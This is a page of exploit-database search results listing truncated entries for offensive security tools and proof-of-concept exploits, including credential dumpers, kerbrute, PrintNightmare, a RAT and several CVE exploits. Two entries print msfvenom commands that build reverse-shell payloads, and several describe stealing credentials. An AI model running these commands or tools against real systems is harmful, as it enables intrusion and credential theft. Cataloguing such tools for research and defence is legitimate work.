Lucene search
+L

223405 matches found

Kitploit
Kitploit
added 2026/09/01 2:01 a.m.9 views

teamviewer-dumper

Dump TeamViewer ID and password from memory Tested on TeamViewer 13 latest: Win10, Win8.1, Win7x64, Win7x32 Installation: root@kitploit: pip3 install frida You can simply run it or compile as a standalone binary: pyinstaller .\tv-dumper.py --onefile Author: Vladimir Ivanov...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/01 1:59 a.m.5 views

WinRE-Patch

WinRE-Patch Patches CVE-2022-41099 Original: https://github.com/halsey51013/UpdateWindowsRE-CVE-2022-41099...

4.6CVSS6.2AI score0.03508EPSS
SaveExploits1References1
Kitploit
Kitploit
added 2026/09/01 1:55 a.m.2 views

wifi-password

wifi-password Obtén rápidamente tu contraseña WiFi y, si es necesario, genera un código QR de tu WiFi para que los teléfonos puedan conectarse fácilmente. Funciona en macOS , Linux y Windows Instalación Instalar usando pip root@kitploit: $ python3 -m pip install --user wifi-password Instalar usan...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/01 1:54 a.m.5 views

CredsLeaker

CredsLeaker v4.x A big shoutout to @ApSecDev who took this project to the next level! Kudos! This script used to display a powershell credentials box asked the user for credentials. However, That was highly noticeable. Now it's time to utilize Windows Security popup! Features AD domain...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/01 1:54 a.m.5 views

CVE-2016-0051

CVE-2016-0051 Proof-of-concept BSoD Blue Screen of Death and Elevation of Privilege to SYSTEM code for my CVE-2016-0051 MS-016. EoP to SYSTEM on Windows 7 SP1 x86 BSoD on a Windows 10 x64 Links Microsoft Security Bulletin MS16-016 Microsoft Acknowledgements page A variant of this PoC where the...

7.8CVSS7.1AI score0.22843EPSS
SaveExploits12References1
Kitploit
Kitploit
added 2026/09/01 1:54 a.m.3 views

allthingsida

Operating system MS Windows PEB/LDRDATATABLEENTRY enumeration scripts PEB/TEB structures x64 PEB/TEB structures x86...

5.9AI score
SaveExploits0References3
Kitploit
Kitploit
added 2026/09/01 1:51 a.m.3 views

CVE-2023-23397-POC

Two POCs I created for the CVE-2023-23397 NTLM vulnerability. Originally the pocs would send meeting requests with a reminder but I was able to send an email with a reminder that required no interaction from the user. The .ps1 file needs to be run from a compromised windows host with a compromise...

9.8CVSS7.2AI score0.97408EPSS
SaveExploits19
Kitploit
Kitploit
added 2026/09/01 1:51 a.m.8 views

CVE-2023-26360-RCE

CVE-2023-26360 - Remote Code Execution on ColdFusion 2021 Sometimes, the scripts don't work at first attempt. Try a few times to make it work How to execute Create a payload with msfvenom root@kitploit: msfvenom -p java/shellreversetcp LHOST=192.168.56.1 LPORT=4444 file.java Starting server.py Th...

9.8CVSS7.4AI score0.97339EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/01 1:50 a.m.6 views

CVE-2021-1675

CVE-2021-1675 - PrintNightmare LPE PowerShell Caleb Stewart | John Hammond | June 1, 2021 CVE-2021-1675 is a critical remote code execution and local privilege escalation vulnerability dubbed "PrintNightmare." Proof-of-concept exploits have been released Python, C++ for the remote code execution...

9.3CVSS7.7AI score0.86132EPSS
SaveExploits62References4
Kitploit
Kitploit
added 2026/09/01 1:48 a.m.6 views

CVE-2024-0670

CVE-2024-0670 – Local Privilege Escalation in CheckMK Agent PowerShell PoC Abstract This repository presents an independent PowerShell proof of concept for CVE-2024-0670 , a Windows local privilege escalation vulnerability in the CheckMK Agent. The vulnerability allows a low-privileged local user...

8.8CVSS7.4AI score0.00332EPSS
SaveExploits5References3
Kitploit
Kitploit
added 2026/09/01 1:40 a.m.317 views

kerbrute

Kerbrute A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication Grab the latest binaries from the releases page to get started. Background This tool grew out of some bash scripts I wrote a few years ago to perform bruteforcing using the...

5.9AI score
SaveExploits0References5
Kitploit
Kitploit
added 2026/09/01 1:39 a.m.5 views

CVE-2021-21551

PoC for CVE-2021-21551 Windows LPE using the Dell dbutil23.sys driver. Exploit approach Implement read/write, allocate shellcode, flip page to bypass smep, overwrite haldispatch ptr, execute shellcode...

8.8CVSS7.3AI score0.79249EPSS
SaveExploits18
Kitploit
Kitploit
added 2026/09/01 1:38 a.m.5 views

NoArgs

NoArgs:操纵和隐藏进程参数 Twitter: @AzizWho 免责声明:仅用于教育目的 本工具仅供教育目的使用。我对任何滥用行为不负责任,所有用户必须遵守适用法律。禁止非法使用。 简介 NoArgs 是一款旨在动态伪造和隐藏进程参数且保持不被检测的工具。它通过挂钩 Windows API 来动态操纵 Windows 内部机制,从而实现对进程参数的隐蔽更改。 默认 Cmd: Windows 事件日志: 使用 NoArgs: Windows 事件日志: 功能概述 该工具主要通过拦截 Windows API 函数 CreateProcessW...

5.9AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/01 1:35 a.m.2 views

PrintNightmare-CVE-2021-1675-CVE-2021-34527

CVE-2021-1675 / CVE-2021-34527 Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng @edwardzpeng & Xuefeng Li @lxf02942370 Tested on a fully patched 2019 Domain Controller Execute malicious DLL's remote or locally Patch update Microsoft has released a patch to...

9.3CVSS7.3AI score0.99792EPSS
SaveExploits74References1
Kitploit
Kitploit
added 2026/09/01 1:33 a.m.5 views

Vayne-RaT

Vayne-RaT is Free and Open Source Remote Administration Tool Coded In C. Features: Multi-Threaded CMD Shell File Manager Download & Upload Remote Desktop Password Recovery Assembly Builder Scan-Time Crypter FUD Requirements Stub Coded In .NET 2.0 Mono.Cecil.dll Dissembler Lib.dll BunifuUIv1.52.dl...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/01 1:30 a.m.2 views

CVE-2024-21412_Water-Hydra

CVE-2024-21412Water-Hydra Deliver malware via CVE-2024-21412 usage Start the services in order, then access the web server. webserver Start a web server in the folder: python -m http.server Initial Access: Use Windows Advanced Query Syntax AQS to link back to a JPEG trojan hosted on a WebDAV shar...

8.1CVSS7.3AI score0.95443EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/01 1:28 a.m.3 views

ForensicMiner

ForensicMiner v1.4 "ForensicMiner, redefine las automatizaciones de DFIR" Creado y mantenido por: Eilay Yosfan ¿Qué es ForensicMiner? ForensicMiner, una herramienta de automatización de DFIR basada en PowerShell, revoluciona el campo de las investigaciones digitales. Diseñada para la eficiencia,...

6AI score
SaveExploits0References7
Kitploit
Kitploit
added 2026/09/01 1:28 a.m.4 views

MS17-010_CVE-2017-0143

MS17-010 🖥️ -h3x0v3rl0rd- ️⃣ CVE-2017-0143 Docker Using msfvenom to Generate a Payload: root@kitploit: msfvenom -p windows/shellreversetcp LHOST=10.10.14.19 LPORT=1337 -f exe -o ms17-010.exe -p windows/shellreversetcp: Specifies the payload a reverse TCP shell for Windows. LHOST=10.10.14.4: The...

9.3CVSS7.4AI score0.93307EPSS
SaveExploits48
Kitploit
Kitploit
added 2026/09/01 1:27 a.m.2 views

Priv2Admin

La idea es "traducir" los privilegios del sistema operativo Windows a una ruta que lleve a: 1. administrador, 2. amenaza de integridad y/o confidencialidad, 3. amenaza de disponibilidad, 4. solo un desastre. Los privilegios se enumeran y explican en:...

5.9AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/01 1:20 a.m.52 views

domi-owned

Domi-Owned Summary Domi-Owned is a tool used for compromising IBM/Lotus Domino servers. Tested on IBM/Lotus Domino 8.5.2, 8.5.3, 9.0.0, and 9.0.1 running on Windows and Linux. Requirements Domi-Owned uses Python 3, which can be install through your distribution's package manager apt, yum, etc...

5.7AI score
SaveExploits0References6
Rows per page
Query Builder